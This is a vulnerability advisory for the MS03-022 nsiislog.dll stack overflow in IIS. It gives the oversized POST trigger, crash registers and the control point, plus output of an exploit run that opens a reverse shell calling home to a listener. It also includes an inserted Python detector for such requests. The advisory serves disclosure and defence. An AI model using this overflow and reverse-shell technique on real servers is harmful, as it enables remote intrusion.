A short time after a long time ago, in a place very similar to the last,
where the sun shines, the snow falls and the water is still clean…
Continuing with our 'Methodical Approach To Finding Overflows' against
nsiislog.dll, we discovered another issue, but due to complications this
fix was not released with the previous nsiislog.dll bulletin.
== MS03-022 states ==
Impact of vulnerability: Allow an attacker to execute code of their choice
Maximum Severity Rating: Important
There is a flaw in the way nsiislog.dll processes incoming client requests.
A vulnerability exists because an attacker could send a specially formed HTTP
request (communications) to the server that could cause IIS to fail or
execute code on the user's system.
== MS03-022 ==
== Description ==
Sending a large standard POST to nsiislog.dll causes an access
violation, producing the error log below.
This is a standard stack-based overflow: EIP ends up set to an
arbitrary value, allowing remote command execution with the privileges
of the IWAM_machinename account.
== Standard HTTP Post ==
POST /scripts/nsiislog.dll HTTP/1.1
content-length: <postlength>
<post data>
Using Size: 4354
Connecting…Sending Buffer…
78028E9F mov al,byte ptr [esi] ESI = 00B138B4
Using Size: 5000
Connecting…Sending Buffer…
40F01F3B repne scas byte ptr [edi] EDI = 58585858
58585858 ??? illegal op EIP = 58585858
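As an added illustration of the request pattern described above (not code from the advisory), the following Python picks out POST requests to nsiislog.dll whose body is large enough to trigger the crash. The 4354 and 5000 byte figures are the ones reported in this advisory; the sample requests are constructed, and the header parsing is a deliberately tolerant stand-in for what a real proxy or IDS would do.

```python
import re
from typing import Optional

# Sizes reported in the advisory: a 4354-byte POST body causes the access
# violation and 5000 bytes overwrites EIP, so anything at or above the
# smaller figure is treated as an attempted overflow.
CRASH_SIZE = 4354
TARGET_NAME = "nsiislog.dll"


def parse_request(raw: bytes) -> Optional[dict]:
    """Split a raw HTTP request into method, path, headers and body.
    Returns None when the request line is malformed."""
    # Accept CRLF or bare LF so a sloppy client cannot dodge the check.
    parts = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)
    head, body = parts[0], (parts[1] if len(parts) > 1 else b"")
    lines = re.split(rb"\r?\n", head)
    request_line = lines[0].split()
    if len(request_line) != 3:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:  # header names are case-insensitive, so normalise them
            headers[name.strip().lower().decode("latin-1")] = \
                value.strip().decode("latin-1")
    return {"method": request_line[0].decode("latin-1").upper(),
            "path": request_line[1].decode("latin-1"),
            "headers": headers, "body": body}


def post_size(req: dict) -> int:
    """Larger of the declared Content-Length and the bytes actually received."""
    declared = req["headers"].get("content-length", "")
    declared_len = int(declared) if declared.isdigit() else 0
    return max(declared_len, len(req["body"]))


def is_nsiislog_overflow(raw: bytes) -> bool:
    """True for a POST to nsiislog.dll large enough to crash it."""
    req = parse_request(raw)
    if req is None or req["method"] != "POST":
        return False
    # IIS paths are case-insensitive; ignore any query string.
    path = req["path"].split("?", 1)[0].lower()
    return path.endswith("/" + TARGET_NAME) and post_size(req) >= CRASH_SIZE


# Constructed sample requests (not captures from the advisory).
BENIGN = b"POST /scripts/nsiislog.dll HTTP/1.1\r\nContent-Length: 40\r\n\r\n" + b"A" * 40
OVERFLOW = b"POST /Scripts/NSIISLOG.DLL HTTP/1.1\r\ncontent-length: 5000\r\n\r\n" + b"X" * 5000
```

Because the size check uses the larger of the declared and actual body length, a request that understates Content-Length while still delivering an oversized body is flagged too.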
== Exploitation ==
Commonly referred to as a stack-based overflow, control is taken when
EIP is set to a value from the stack. This class is widely known and
easily exploitable by using a call or jmp instruction, or in the worst
case a brute-force technique of direct jumps.
In this case control is taken when a value is obtained from the stack
and then used in a direct call.
77FB98E1 mov ecx,dword ptr [ebp+18h]
77FB98E4 call ecx
== Exploit Example ==
%:\>exploit 192.168.1.63
IISNSLOG.DLL - Remote Shell
. Calling Home: blackhole:2000
. Shellcode Size: 322 bytes
. Preparing Exploit Buffer…Ready
. Starting Listener On Port: 2000
. Connecting To Target
. Sending Exploit…Exploit Sent
. Connection Received
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>whoami
IWAM_BLACKHOLE
C:\WINNT\system32>
== Solutions ==
Apply the patch provided with Microsoft Security Bulletin MS03-022.
== Credit ==
Discovered and advised to Microsoft January 30, 2003 by Brett Moore of
Security-Assessment.com
%-) viva Las Vegas!!
== About Security-Assessment.com ==
Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, an online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team has previously identified a
number of vulnerabilities in public and private software vendors' products.